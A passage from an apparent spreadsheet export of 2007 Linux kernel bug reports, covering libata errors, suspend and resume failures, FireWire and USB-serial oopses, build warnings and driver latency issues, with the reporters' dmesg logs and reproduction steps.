uname: 2.6.21.5 x86_64 Intel(R) Core(TM)2 CPU 6600 @ 2.40GHz Gentoo Base System release 1.12.9 Timestamp of tree: Wed, 13 Jun 2007 12:20:01 +0000 distcc 2.18.3 x86_64-pc-linux-gnu (protocols 1 and 2) (default port 3632) [disabled] ccache version 2.4 [enabled] dev-java/java-config: 1.3.7, 2.0.32 dev-lang/python: 2.4.4-r4 dev-python/pycrypto: 2.0.1-r5 dev-util/ccache: 2.4-r7 sys-apps/sandbox: 1.2.17 sys-devel/autoconf: 2.13, 2.61 sys-devel/automake: 1.4_p6, 1.5, 1.6.3, 1.7.9-r1, 1.8.5-r3, 1.9.6-r2, 1.10 sys-devel/binutils: 2.16.1-r3 sys-devel/gcc-config: 1.3.16 sys-devel/libtool: 1.5.22 virtual/os-headers: 2.6.17-r2 ACCEPT_KEYWORDS="amd64" AUTOCLEAN="yes" CBUILD="x86_64-pc-linux-gnu" CFLAGS="-march=nocona -O2 -pipe -fomit-frame-pointer" CHOST="x86_64-pc-linux-gnu" CONFIG_PROTECT="/etc /usr/kde/3.5/env /usr/kde/3.5/share/config /usr/kde/3.5/shutdown /usr/shar e/X11/xkb /usr/share/config" CONFIG_PROTECT_MASK="/etc/env.d /etc/env.d/java/ /etc/gconf /etc/revdep-rebuild /etc/terminfo / etc/texmf/web2c" CXXFLAGS="-march=nocona -O2 -pipe -fomit-frame-pointer" DISTDIR="/usr/portage/distfiles" FEATURES="ccache distlocks metadata-transfer parallel-fetch sandbox sfperms strict" GENTOO_MIRRORS="ftp://ftp.belnet.be/mirror/rsync.gentoo.org/gentoo/ ftp://ftp.easynet.nl/mirror /gentoo/ http://distfiles.gentoo.org http://www.ibiblio.org/pub/Linux/distributions/gentoo" LANG="de_DE.utf8" LC_ALL="de_DE.utf8" LINGUAS="de sv" MAKEOPTS="-j3" PKGDIR="/usr/portage/packages" PORTAGE_RSYNC_OPTS="--recursive --links --safe-links --perms --times --compress --force --whole -file --delete --delete-after --stats --timeout=180 --exclude=/distfiles --exclude=/local --exc lude=/packages --filter=H_**/files/digest-*" PORTAGE_TMPDIR="/var/tmp" PORTDIR="/usr/portage" PORTDIR_OVERLAY="/usr/portage/local/layman/xeffects /usr/portage/local/layman/sunrise /usr/loca l/portage" SYNC="rsync://rsync.europe.gentoo.org/gentoo-portage" USE="X a52 aac aalib acpi additions aiglx alsa amd64 ares asf bash-completion berkdb bitmap-fon ts bittorrent bluetooth bzip2 cairo cdparanoia cli connectionstatus cpudetection cracklib crypt css cups curl daap dbus dga divx4linux dri dts dv dvd dvdr dvdread edl emovix encode exif fam fbcon ffmpeg flac foomaticdb fortran gdbm gif gimp glitz gnutls gpm gtk gtk2 hal highlight hist ory iconv imagemagick isdnlog java jpeg jpeg2k kde kqemu libg++ lirc live lm_sensors logitech-m ouse lzo mad madwifi matroska metalink midi mjpeg modplug mp3 mpeg mplayer mudflap musepack mus icbrainz ncurses network nfs nls nptl nptlonly nsplugin nvidia ogg openal opengl openmp pam pam _console pcre pda pdf perl png ppds pppd python qt3 qt3support qt4 quicktime readline reflectio n rtc samba scanner sdk sdl sensord session sndfile spell spl ssl svg tcltk tcpd theora tiff tk transcode transparency truetype truetype-fonts type1-fonts unicode usb userlocales utempter v4 l v4l2 vcd vditool vidcap vorbis wxwindows x264 xine xinerama xml xorg xvid yahoo zlib" ALSA_CA RDS="hda-intel intel8x0" ALSA_PCM_PLUGINS="adpcm alaw asym copy dmix dshare dsnoop empty extplu g file hooks iec958 ioplug ladspa lfloat linear meter mulaw multi null plug rate route share sh m softvol" ELIBC="glibc" INPUT_DEVICES="keyboard mouse evdev" KERNEL="linux" LCD_DEVICES="bayra d cfontz cfontz633 glk hd44780 lb216 lcdm001 mtxorb ncurses text" LINGUAS="de sv" LIRC_DEVICES= "asusdh" USERLAND="GNU" VIDEO_CARDS="nvidia vesa fbdev nv" Unset: CTARGET, EMERGE_DEFAULT_OPTS, INSTALL_MASK, LDFLAGS, PORTAGE_COMPRESS, PORTAGE_COMPRESS _FLAGS, PORTAGE_RSYNC_EXTRA_OPTS Problem Description: Every time I get this "HSM violation" the pc is stuttering for a second. I was listening to music and noticed randomly a stuttering in the music so I checked dmesg everytime I noticed such a stutter. And yes, everytime the music stutters I got this: ata9.01: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x2 ata9.01: (BMDMA stat 0x4) ata9.01: cmd a0/01:00:00:00:00/00:00:00:00:00/b0 tag 0 cdb 0x4a data 8 in res 00/00:00:00:00:00/00:00:00:00:00/00 Emask 0x2 (HSM violation) ata9: soft resetting port ata9.00: configured for UDMA/33 ata9.01: configured for UDMA/100 ata9: EH complete Steps to reproduce: Listen to music and just wait....</t>
  </si>
  <si>
    <t>Samsung X20 laptop doesn't resume from suspend-to-ram under 2.6.21, but works with 2.6.20</t>
  </si>
  <si>
    <t>2007-06-16 09:41 UTC</t>
  </si>
  <si>
    <t>Jens Lautenbacher</t>
  </si>
  <si>
    <t>2007-11-17 05:42 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.20 - all versions released in Fedora Core 6 worked completely flawlessly. I use the last 2.6.20 kernel in Fedora 7 now, and it also works in this environment as expected. Distribution: Fedora 7 Hardware Environment: Samsung X20 Laptop with i916GM video card. Software Environment: all Fedora 7 2.6.21 Kernels (internal numbers kernel-2.6.21-1.3194.fc7 and kernel-2.6.21-1.3228.fc7) Problem Description: 2.6.21 doesn't allow my Samsung X20 laptop to resume from suspend-to-ram. Backlight goes on, I see a yellow "inu" printed on the screen, the LED for the hard disk goes on, but remains steady on. Nothing more happens. There are now problems when using a 2.6.20 kernel in the very same environment (Fedora 7 updated as of 2007-06-16)</t>
  </si>
  <si>
    <t>Uncomplete input support for latest MS keyboards</t>
  </si>
  <si>
    <t>2007-06-17 04:06 UTC</t>
  </si>
  <si>
    <t>2008-09-24 09:20 UTC</t>
  </si>
  <si>
    <t>Using a MS Ergo 4000 showkey finds the following problems: – the "spell", star, favorite-1 to favorite-5 keys do not work at all – the parentleft and parentright keys emit the same 240 code</t>
  </si>
  <si>
    <t>fw-ohci and ohci1394: panic in softirq, below smp_apic_timer_interrupt</t>
  </si>
  <si>
    <t>2007-06-17 14:04 UTC</t>
  </si>
  <si>
    <t>2008-02-24 10:52 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unknown Hardware Environment: SMP i586 and SMP x86-64 Software Environment: Linux 2.6.x If an SBP-2 device is attached and sbp2 or firewire-sbp2 is loaded, any of the following commands # modprobe -r sbp2 &amp;&amp; modprobe -r ohci1394 # modprobe -r firewire-ohci # modprobe -r firewire-sbp2 firewire-ohci # modprobe -r firewire-sbp2 &amp;&amp; sleep 0 &amp;&amp; modprobe -r firewire-ohci will lead to a panic with a trace similar to this: general protection fault [...] Pid: 0, comm: swapper [...] run_timer_softirq __do_softirq call_softirq do_softirq irq_exit smp_apic_timer_interrupt mwait_idle apic_timer_interrupt [...] This happened on two different i945GM based boards with Core 2 Duo, 32-bit and 64-bit kernels. The last time I tried this with ohci1394/sbp2 is a while ago. I just saw it now happening in the new drivers too. The same trace also happened on an older kernel repeatedly in a totally different context, without FireWire drivers loaded: It could be triggered by "make -j" in the kernel source tree, i.e. by a spawning something with many subthreads. I don't have a spare machine with enough RAM available to test this again with a recent kernel, for now. I will try to make the machine where I saw it available again. I.e. the bug may be entirely outside the old and new FireWire drivers. *Not* affected are: - The same machines with "modprobe -r firewire-sbp2 &amp;&amp; sleep 0.1 &amp;&amp; modprobe -r firewire-ohci", - A VIA KM-266/ AMD-Athlon single-CPU PC, even if running an SMP kernel. I will attach a sample screenshot in a follow-up entry.</t>
  </si>
  <si>
    <t>PANIC: CPU too old for this kernel. with Crusoe CPU</t>
  </si>
  <si>
    <t>2.6.22-rcX</t>
  </si>
  <si>
    <t>2007-06-17 22:57 UTC</t>
  </si>
  <si>
    <t>CHIKAMA Masaki</t>
  </si>
  <si>
    <t>2007-06-24 20:01 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.21.5 Distribution: Fedora 7 Hardware Environment: cat /proc/cpuinfo processor : 0 vendor_id : GenuineTMx86 cpu family : 6 model : 4 model name : Transmeta(tm) Crusoe(tm) Processor TM5600 stepping : 3 cpu MHz : 500.000 cache size : 512 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr cx8 cmov mmx longrun constant_tsc up bogomips : 1196.55 clflush size : 32 Software Environment: Fedora 7 + rawhide kernel , Fedora 7 + vanilla 2.6.22-rcX kernel. Problem Description: My Laptop with Transmeta Crusoe CPU fail to boot with this message. "PANIC: CPU too old for this kernel." Rebuilding with CONFIG_M486 works fine. I only checked rc3 and rc5. Steps to reproduce: Compiling with CONFIG_M686 then boot with the kernel.</t>
  </si>
  <si>
    <t>pata_via fails to initialize dvd burner</t>
  </si>
  <si>
    <t>2007-06-18 07:45 UTC</t>
  </si>
  <si>
    <t>Marcin Kurek</t>
  </si>
  <si>
    <t>2008-09-24 04:17 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Good question Distribution: Gentoo Hardware Environment: Pegasos 2 / PPC G4 1GHz / 1GB Ram Software Environment: - Problem Description: Generaly I must say my ATAPI drive fails always with libata pata driver, but some time ago I decide to upgrade my Fedora 6 to recent version and it seems they switched completly to libata and this is a good reason to report this here I guess. When booting libata enabled kernel it fails with following message: .... ata2.00: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x2 frozen ata2.00: cmd a0/01:00:00:00:00/00:00:00:00:00/a0 tag 0 cdb 0x12 data 36 in res 40/00:00:00:00:00/00:00:00:00:00/00 Emask 0x4 (timeout) ata2: soft resetting port ata2.00: configured for UDMA/66 ata2: EH complete ata2.00: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x2 frozen ata2.00: cmd a0/01:00:00:00:00/00:00:00:00:00/a0 tag 0 cdb 0x12 data 36 in res 40/00:00:00:00:00/00:00:00:00:00/00 Emask 0x4 (timeout) ata2: soft resetting port ata2.00: configured for UDMA/66 ata2: EH complete ata2.00: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x2 frozen ata2.00: cmd a0/01:00:00:00:00/00:00:00:00:00/a0 tag 0 cdb 0x12 data 36 in res 40/00:00:00:00:00/00:00:00:00:00/00 Emask 0x4 (timeout) ata2: soft resetting port ata2.00: configured for UDMA/66 ata2: EH complete ata2.00: limiting speed to UDMA/44:PIO4 ata2.00: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x2 frozen ata2.00: cmd a0/01:00:00:00:00/00:00:00:00:00/a0 tag 0 cdb 0x12 data 36 in res 40/00:00:00:00:00/00:00:00:00:00/00 Emask 0x4 (timeout) ata2: soft resetting port ata2.00: configured for UDMA/44 ata2: EH complete .... In previous kernel version (.19) it fails when set xfermode with similar message, but after diging up on redhat bugzilla I located a patch to enable ATA_TFLAG_POLLING by default (Attached) and now it looks like that. Fedora installer complains about missing CD/DVD driver and it makes impossible to install/upgrade it here. I send some e-mails to Alan Cox about this problem when I first try to use pata_via (Around 2.6.16/2.6.17), but without any result. I attach a full serial log from faulty boot and hdparm/lspci info from my system. Steps to reproduce: -</t>
  </si>
  <si>
    <t>disk errors due SATA timeout</t>
  </si>
  <si>
    <t>2007-06-19 04:08 UTC</t>
  </si>
  <si>
    <t>2008-09-24 06:51 UTC</t>
  </si>
  <si>
    <t>VIA VT6420 SATA RAID Controller on MSI motherboard, RHEL5 distribution, x86_64 kernel. On booting hardware initialized properly and all works fine some time, but then it detects timeout on sata disc. Originally was found on RHEL5 kernels, and it lead to device disconnect. Reproduced on 2.6.22-rc4 kernel, in this case EH works well and disk become alive, however due ext3 errors filesystem remounts to RO.</t>
  </si>
  <si>
    <t>Inconsistencies in configuration system 'Section mismatch'</t>
  </si>
  <si>
    <t>2007-06-23 04:47 UTC</t>
  </si>
  <si>
    <t>2007-10-23 13:46 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.22-rc5 Distribution: Debian Sid gcc (GCC) 4.1.3 20070601 (prerelease) (Debian 4.1.2-12) Problem Description: It seems that there are some inconsistencies in the kernel configuration system. These warnings are not fatal because the kernel compiles completely and boots on my system. When compiling the kernel I get the following warnings: scripts/kconfig/conf -s arch/i386/Kconfig drivers/input/keyboard/Kconfig:170:warning: 'select' used by config symbol 'KEYBOARD_ATARI' refers to undefined symbol 'ATARI_KBD_CORE' drivers/input/mouse/Kconfig:182:warning: 'select' used by config symbol 'MOUSE_ATARI' refers to undefined symbol 'ATARI_KBD_CORE' CHK include/linux/version.h CHK include/linux/utsrelease.h CALL scripts/checksyscalls.sh CHK include/linux/compile.h GZIP kernel/config_data.gz IKCFG kernel/config_data.h CC kernel/configs.o ... SYSMAP System.map SYSMAP .tmp_System.map MODPOST vmlinux WARNING: arch/i386/kernel/built-in.o(.text+0x9dda): Section mismatch: reference to .init.text:amd_init_mtrr (between 'mtrr_bp_init' and 'mtrr_attrib_to_str') WARNING: arch/i386/kernel/built-in.o(.text+0x9ddf): Section mismatch: reference to .init.text:cyrix_init_mtrr (between 'mtrr_bp_init' and 'mtrr_attrib_to_str') WARNING: arch/i386/kernel/built-in.o(.text+0x9de4): Section mismatch: reference to .init.text:centaur_init_mtrr (between 'mtrr_bp_init' and 'mtrr_attrib_to_str') WARNING: arch/i386/kernel/built-in.o(.text+0xae87): Section mismatch: reference to .init.text: (between 'get_mtrr_state' and 'generic_get_mtrr') WARNING: arch/i386/kernel/built-in.o(.text+0xae9b): Section mismatch: reference to .init.text: (between 'get_mtrr_state' and 'generic_get_mtrr') WARNING: arch/i386/kernel/built-in.o(.text+0xaec0): Section mismatch: reference to .init.text: (between 'get_mtrr_state' and 'generic_get_mtrr') AS arch/i386/boot/bootsect.o ...</t>
  </si>
  <si>
    <t>sky2 crash when return from resume to ram</t>
  </si>
  <si>
    <t>2007-06-24 14:51 UTC</t>
  </si>
  <si>
    <t>2009-04-02 04:47 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Etch Hardware Environment: Laptop Toshiba M45-S355 Problem Description: Suspend to ram work fine in my Toshiba M45-S355, but when laptop return (from RAM), my network connection crash, and I need unload and load again my sky2 module. My NIC is: Marvell Technology Group Ltd. 88E8036 PCI-E Fast Ethernet Controller (rev 10) Rafael J. Wysocki (from LKML) recommend open this issue on this category (Power Management). kernel: sky2 eth1: disabling interface kernel: sky2 eth1: enabling interface kernel: sky2 eth1: ram buffer 4K kernel: ADDRCONF(NETDEV_UP): eth1: link is not ready kernel: uhci_hcd 0000:00:1d.3: remove, state 4 kernel: usb usb4: USB disconnect, address 1 kernel: uhci_hcd 0000:00:1d.3: USB bus 4 deregistered kernel: ACPI: PCI interrupt for device 0000:00:1d.3 disabled kernel: uhci_hcd 0000:00:1d.2: remove, state 4 kernel: usb usb3: USB disconnect, address 1 kernel: uhci_hcd 0000:00:1d.2: USB bus 3 deregistered kernel: ACPI: PCI interrupt for device 0000:00:1d.2 disabled kernel: uhci_hcd 0000:00:1d.1: remove, state 4 kernel: usb usb2: USB disconnect, address 1 kernel: uhci_hcd 0000:00:1d.1: USB bus 2 deregistered kernel: ACPI: PCI interrupt for device 0000:00:1d.1 disabled kernel: uhci_hcd 0000:00:1d.0: remove, state 1 kernel: usb usb1: USB disconnect, address 1 kernel: usb 1-1: USB disconnect, address 4 kernel: uhci_hcd 0000:00:1d.0: USB bus 1 deregistered kernel: ACPI: PCI interrupt for device 0000:00:1d.0 disabled kernel: Stopping tasks ... done. kernel: Suspending console(s) kernel: sky2 eth1: Link is up at 100 Mbps, full duplex, flow control both kernel: ADDRCONF(NETDEV_CHANGE): eth1: link becomes ready kernel: ACPI: PCI interrupt for device 0000:05:06.4 disabled kernel: ACPI: PCI interrupt for device 0000:05:06.3 disabled kernel: eth2: Going into suspend... kernel: ACPI: PCI interrupt for device 0000:05:04.0 disabled kernel: sky2 eth1: disabling interface kernel: ACPI: PCI interrupt for device 0000:00:1f.2 disabled kernel: ACPI: PCI interrupt for device 0000:00:1e.3 disabled kernel: ACPI: PCI interrupt for device 0000:00:1e.2 disabled kernel: ACPI: PCI interrupt for device 0000:00:1d.7 disabled kernel: Intel machine check architecture supported. kernel: Intel machine check reporting enabled on CPU#0. kernel: ACPI: PCI Interrupt 0000:00:02.0[A] -&gt; Link [LNKA] -&gt; GSI 11 (level, low) -&gt; IRQ 11 kernel: ACPI: PCI Interrupt 0000:00:1c.0[A] -&gt; Link [LNKB] -&gt; GSI 10 (level, low) -&gt; IRQ 10 kernel: ACPI: PCI Interrupt 0000:00:1c.1[B] -&gt; Link [LNKA] -&gt; GSI 11 (level, low) -&gt; IRQ 11 kernel: PCI: Enabling device 0000:00:1d.7 (0000 -&gt; 0002) kernel: ACPI: PCI Interrupt 0000:00:1d.7[A] -&gt; Link [LNKH] -&gt; GSI 10 (level, low) -&gt; IRQ 10 kernel: ACPI: PCI Interrupt 0000:00:1e.2[A] -&gt; Link [LNKB] -&gt; GSI 10 (level, low) -&gt; IRQ 10 kernel: ACPI: PCI Interrupt 0000:00:1e.3[B] -&gt; Link [LNKE] -&gt; GSI 5 (level, low) -&gt; IRQ 5 kernel: ACPI: PCI Interrupt 0000:00:1f.2[B] -&gt; Link [LNKD] -&gt; GSI 11 (level, low) -&gt; IRQ 11 kernel: sky2 eth1: enabling interface kernel: sky2 eth1: ram buffer 4K kernel: eth2: Coming out of suspend... kernel: PCI: Enabling device 0000:05:04.0 (0000 -&gt; 0002) kernel: ACPI: PCI Interrupt 0000:05:04.0[A] -&gt; Link [LNKA] -&gt; GSI 11 (level, low) -&gt; IRQ 11 kernel: ACPI: PCI Interrupt 0000:05:06.2[C] -&gt; Link [LNKG] -&gt; GSI 6 (level, low) -&gt; IRQ 6 kernel: ACPI: PCI Interrupt 0000:05:06.3[D] -&gt; Link [LNKE] -&gt; GSI 5 (level, low) -&gt; IRQ 5 kernel: ACPI: PCI Interrupt 0000:05:06.4[A] -&gt; Link [LNKC] -&gt; GSI 11 (level, low) -&gt; IRQ 11 kernel: ata1.00: configured for UDMA/100 kernel: SCSI device sda: 195371568 512-byte hdwr sectors (100030 MB) kernel: sda: Write Protect is off kernel: SCSI device sda: write cache: enabled, read cache: enabled, doesn't support DPO or FUA kernel: sky2 eth1: Link is up at 100 Mbps, full duplex, flow control both kernel: ata2.00: configured for UDMA/33 kernel: Restarting tasks ... done. kernel: ipw2200: Radio Frequency Kill Switch is On: kernel: Kill switch must be turned off for wireless networking to work. kernel: ohci1394: fw-host0: OHCI-1394 1.1 (PCI): IRQ=[11] MMIO=[b8000000-b80007ff] Max Packet=[2048] IR/IT contexts=[4/8] kernel: eth1394: eth0: IEEE-1394 IPv4 over 1394 Ethernet (fw-host0) kernel: USB Universal Host Controller Interface driver v3.0 kernel: ACPI: PCI Interrupt 0000:00:1d.0[A] -&gt; Link [LNKH] -&gt; GSI 10 (level, low) -&gt; IRQ 10 kernel: uhci_hcd 0000:00:1d.0: UHCI Host Controller kernel: uhci_hcd 0000:00:1d.0: new USB bus registered, assigned bus number 1 kernel: uhci_hcd 0000:00:1d.0: irq 10, io base 0x00001200 kernel: usb usb1: configuration #1 chosen from 1 choice kernel: hub 1-0:1.0: USB hub found kernel: hub 1-0:1.0: 2 ports detected kernel: ACPI: PCI Interrupt 0000:00:1d.1[B] -&gt; Link [LNKD] -&gt; GSI 11 (level, low) -&gt; IRQ 11 kernel: uhci_hcd 0000:00:1d.1: UHCI Host Controller kernel: uhci_hcd 0000:00:1d.1: new USB bus registered, assigned bus number 2 kernel: uhci_hcd 0000:00:1d.1: irq 11, io base 0x00001220 kernel: usb usb2: configuration #1 chosen from 1 choice kernel: hub 2-0:1.0: USB hub found kernel: hub 2-0:1.0: 2 ports detected kernel: ACPI: PCI Interrupt 0000:00:1d.2[C] -&gt; Link [LNKC] -&gt; GSI 11 (level, low) -&gt; IRQ 11 kernel: uhci_hcd 0000:00:1d.2: UHCI Host Controller kernel: uhci_hcd 0000:00:1d.2: new USB bus registered, assigned bus number 3 kernel: uhci_hcd 0000:00:1d.2: irq 11, io base 0x00001240 kernel: usb usb3: configuration #1 chosen from 1 choice kernel: hub 3-0:1.0: USB hub found kernel: hub 3-0:1.0: 2 ports detected kernel: ACPI: PCI Interrupt 0000:00:1d.3[D] -&gt; Link [LNKA] -&gt; GSI 11 (level, low) -&gt; IRQ 11 kernel: uhci_hcd 0000:00:1d.3: UHCI Host Controller kernel: uhci_hcd 0000:00:1d.3: new USB bus registered, assigned bus number 4 kernel: uhci_hcd 0000:00:1d.3: irq 11, io base 0x00001260 kernel: usb usb4: configuration #1 chosen from 1 choice kernel: hub 4-0:1.0: USB hub found kernel: hub 4-0:1.0: 2 ports detected kernel: usb 1-1: new low speed USB device using uhci_hcd and address 2 kernel: sky2 eth1: disabling interface kernel: sky2 eth1: enabling interface kernel: sky2 eth1: ram buffer 4K kernel: ADDRCONF(NETDEV_UP): eth1: link is not ready kernel: usb 1-1: configuration #1 chosen from 1 choice kernel: input: Microsoft Microsoft 3-Button Mouse with IntelliEye? as /class/input/input8 kernel: input: USB HID v1.00 Mouse [Microsoft Microsoft 3-Button Mouse with IntelliEye?] on usb-0000:00:1d.0-1 kernel: ADDRCONF(NETDEV_UP): eth2: link is not ready kernel: sky2 eth1: Link is up at 100 Mbps, full duplex, flow control both kernel: ADDRCONF(NETDEV_CHANGE): eth1: link becomes ready dhcdbd: message_handler: message handler not found under /com/redhat/dhcp/eth1 for sub-path eth1.dbus.get.host_name dhcdbd: message_handler: message handler not found under /com/redhat/dhcp/eth1 for sub-path eth1.dbus.get.domain_name dhcdbd: message_handler: message handler not found under /com/redhat/dhcp/eth1 for sub-path eth1.dbus.get.nis_domain dhcdbd: message_handler: message handler not found under /com/redhat/dhcp/eth1 for sub-path eth1.dbus.get.nis_servers gconfd (yamane-5230): starting (versão 2.16.1), pid 5230 user 'yamane' gconfd (yamane-5230): Address "xml:readonly:/etc/gconf/gconf.xml.mandatory" resolved from a config source with only read permissions in position 0 gconfd (yamane-5230): Address "xml:readwrite:/home/yamane/.gconf" resolved from a config source with write permissions in positiono 1 gconfd (yamane-5230): Address "xml:readonly:/etc/gconf/gconf.xml.defaults" resolved from a config source with only read permissions in position 2 gconfd (yamane-5230): Address "xml:readonly:/var/lib/gconf/debian.defaults" resolved from a config source with only read permissions in position 3 gconfd (yamane-5230): Address "xml:readonly:/var/lib/gconf/defaults" resolved from a config source with only read permissions in position 4</t>
  </si>
  <si>
    <t>CPU frequency always on highest frequency after wakeup from suspend to disk</t>
  </si>
  <si>
    <t>P1 low</t>
  </si>
  <si>
    <t>2.6.22-rc5-git8</t>
  </si>
  <si>
    <t>2007-06-25 05:01 UTC</t>
  </si>
  <si>
    <t>Markus Schaub</t>
  </si>
  <si>
    <t>2007-08-09 07:14 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unkown Distribution: Gentoo Linux Hardware Environment: IBM Thinkpad T43 Software Environment: Problem Description: cpufreq_conservative doesn't scale CPU frequency anymore after wakeup from suspend to disk, instead CPU runs always with the highest available frequency. Scaling driver is acpi-cpufreq. Steps to reproduce: Choose cpufreq_conservative as scaling driver and execute "echo disk &gt; /sys/power/state".</t>
  </si>
  <si>
    <t>Lite-on dvd burner fails IDENTIFY and disables with dvd-rw media</t>
  </si>
  <si>
    <t>2.6.22-rc6 (git from this morning) + mv-ahci patch</t>
  </si>
  <si>
    <t>2007-06-28 13:40 UTC</t>
  </si>
  <si>
    <t>Paul E. Erkkila</t>
  </si>
  <si>
    <t>2008-09-24 06:48 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: never tried Distribution: gentoo ish Hardware Environment: intel D975XBX2, 4g ram, x86_64 Software Environment: Problem Description: Inserting dvd-rw media in my sata cdrom causes error spew, and ata+EH take the device offline. I'm able to watch dvd, listen to music, rip dvd/cd with no problems. Drive: scsi 7:0:0:0: CD-ROM LITE-ON DVDRW LH-20A1S 9L03 PQ: 0 ANSI: 5 sr0: scsi3-mmc drive: 94x/94x writer dvd-ram cd/rw xa/form2 cdda tray Uniform CD-ROM driver Revision: 3.20 sr 7:0:0:0: Attached scsi CD-ROM sr0 sr 7:0:0:0: Attached scsi generic sg6 type 5 Errors from dmesg: ata8.00: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x2 frozen ata8.00: cmd a0/00:00:00:00:20/00:00:00:00:00/a0 tag 0 cdb 0x5a data 2 in res 40/00:03:00:00:00/00:00:00:00:00/a0 Emask 0x4 (timeout) ata8: soft resetting port ata8: softreset failed (port busy but CLO unavailable) ata8: reset failed (errno=-95), retrying in 10 secs ata8: hard resetting port ata8: SATA link up 1.5 Gbps (SStatus 113 SControl 300) ata8.00: qc timeout (cmd 0xa1) ata8.00: failed to IDENTIFY (I/O error, err_mask=0x4) ata8.00: revalidation failed (errno=-5) ata8: failed to recover some devices, retrying in 5 secs ata8: hard resetting port ata8: SATA link up 1.5 Gbps (SStatus 113 SControl 300) ata8.00: qc timeout (cmd 0xa1) ata8.00: failed to IDENTIFY (I/O error, err_mask=0x4) ata8.00: revalidation failed (errno=-5) ata8.00: limiting speed to UDMA/100:PIO3 ata8: failed to recover some devices, retrying in 5 secs ata8: hard resetting port ata8: SATA link up 1.5 Gbps (SStatus 113 SControl 300) ata8.00: qc timeout (cmd 0xa1) ata8.00: failed to IDENTIFY (I/O error, err_mask=0x4) ata8.00: revalidation failed (errno=-5) ata8.00: disabled ata8: EH complete Steps to reproduce: insert dvd-rw media, press load button ;). I'll try cd-r/dvd-r media when I get a chance to see if it is media specific. The dvd-rw is fresh off the spindle new and has never been formatted or blanked. I'll see if I can find another brand of media to jam in there too. This hardware has never been tested before either, so if I can find some time this weekend i'll pull it and put it in another machine to make sure the burner bits work.</t>
  </si>
  <si>
    <t>r8169: high latency when packet fragmentation occurs (NFS)</t>
  </si>
  <si>
    <t>2007-06-28 16:59 UTC</t>
  </si>
  <si>
    <t>Sylvain Le Gall</t>
  </si>
  <si>
    <t>2007-10-07 06:34 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Debian Hardware Environment: MB Kontron 986LCD, Core 2 Duo T7600, 2GB DDR, plug + cable Cat6 shielded (SFTP) Software Environment: Debian Unstable Problem Description: When using r8169 module, i must wait for a random time to get the whole information on big NFS shared directory. The time range from 0.5 to 13s. After the first call, the second is almost immediate. Looking at wireshark/tcpdump, it seems to happen every time i get a "Reassembled PDU" (the time between first packet and this PDU determine how much time between 0.5 and 13s it will take). It seems that the situation get worst with time. This is a bit annoying because the "big" directory is my home dir! Using r1000 (realtek driver) 1.05 (not 1.05a which oops), i have a constant time of 0.005s. I have no problem of speed and latency in other case. Steps to reproduce: Computer A has a RTL8111/8168B PCI Express Gigabit Ethernet controller Computer B is a standard computer 1. create a /dir/ with a lot of hidden file (.XXX) on A 2. export /dir/ with NFS from A to B 2. mount /dir/ &amp;&amp; umount /dir/ &amp;&amp; time ls /dir/ on B It can also be useful to "touch /dir/test" which seems to trigger a new RPC call to A.</t>
  </si>
  <si>
    <t>HVR 1100 remote does not work after resume from S3 or S5</t>
  </si>
  <si>
    <t>2007-06-29 10:45 UTC</t>
  </si>
  <si>
    <t>Peter Poklop</t>
  </si>
  <si>
    <t>2007-10-05 11:40 UTC</t>
  </si>
  <si>
    <t>Distribution:Ubuntu 7.04 Problem Description: The Hauppauge HVR 1100 ir-remote control does not work after resume from suspend to ram or disk. After reloading the cx88*-modules the remote works again. After adding the following lines in the function cx8800_resume in module cx88-video.c the remote works instantly after resume (this is only a hack): cx_write(MO_DDS_IO, 0xa80a80); /* 4 kHz sample rate */ cx_write(MO_DDSCFG_IO, 0x5); /* enable */ cx_set(MO_PCI_INTMSK, core-&gt;pci_irqmask);</t>
  </si>
  <si>
    <t>ftd_sio: usb-serial problem</t>
  </si>
  <si>
    <t>2.6.21-5</t>
  </si>
  <si>
    <t>2007-07-01 13:54 UTC</t>
  </si>
  <si>
    <t>al ganote</t>
  </si>
  <si>
    <t>2009-03-23 11:13 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unknown Distribution: fedora 7 Hardware Environment: dell dimension 2300 Software Environment: fedora 7 gnome Problem Description: lirc serial device home electronics tira-2 causes an oops in the kernel. tried w/fedora 7 stock kenernel 2.6.21-1 and vanilla kernel 2.6.21-5 w/same problem. tried w/o lirc installed and configured, same problem. problem may be w/ftd_sio module but does not appear to be. output of dmesg: usbcore: registered new interface driver usbfs usbcore: registered new interface driver hub usbcore: registered new device driver usb usbcore: registered new interface driver libusual usbcore: registered new interface driver hiddev usbcore: registered new interface driver usbhid drivers/usb/input/hid-core.c: v2.6:USB HID core driver usb usb1: configuration #1 chosen from 1 choice usb usb2: configuration #1 chosen from 1 choice usb usb3: configuration #1 chosen from 1 choice usb usb4: configuration #1 chosen from 1 choice usb 2-2: new full speed USB device using uhci_hcd and address 3 usb 2-2: configuration #1 chosen from 1 choice usbcore: registered new interface driver usbserial drivers/usb/serial/usb-serial.c: USB Serial support registered for generic usbcore: registered new interface driver usbserial_generic drivers/usb/serial/usb-serial.c: USB Serial Driver core drivers/usb/serial/usb-serial.c: USB Serial support registered for FTDI USB Serial Device Modules linked in: ftdi_sio parport_pc parport snd_ens1371 gameport snd_rawmidi snd_ac97_codec ac97_bus snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq usbserial snd_seq_device snd_pcm_oss snd_mixer_oss snd_pcm tulip snd_timer snd soundcore snd_page_alloc serio_raw i2c_i810 pcspkr i2c_algo_bit iTCO_wdt iTCO_vendor_support i2c_i801 i2c_core sr_mod cdrom sg floppy 